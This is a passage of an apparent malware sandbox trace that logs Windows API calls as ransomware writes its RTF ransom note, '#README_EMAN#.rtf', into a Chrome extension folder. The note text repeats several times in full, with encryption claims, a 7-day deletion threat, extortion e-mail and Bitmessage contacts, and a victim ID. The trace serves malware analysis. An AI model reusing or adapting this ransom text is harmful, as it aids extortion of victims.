lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nJ\x8eú\x10\x11\x13\x15ÔÒÅ3'g\x18ÂÉ=)ͪõ}Ó\x14", lpUsedDefaultChar=0x0) returned 8717 [0273.345] WriteFile (in: hFile=0x294, lpBuffer=0x1ef9408*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9408*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0273.346] CloseHandle (hObject=0x294) returned 1 [0273.346] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\#readme_eman#.rtf")) returned 0xffffffff [0273.346] GetLastError () returned 0x2 [0273.346] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\de\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0273.346] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.346] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0273.346] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef9408, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 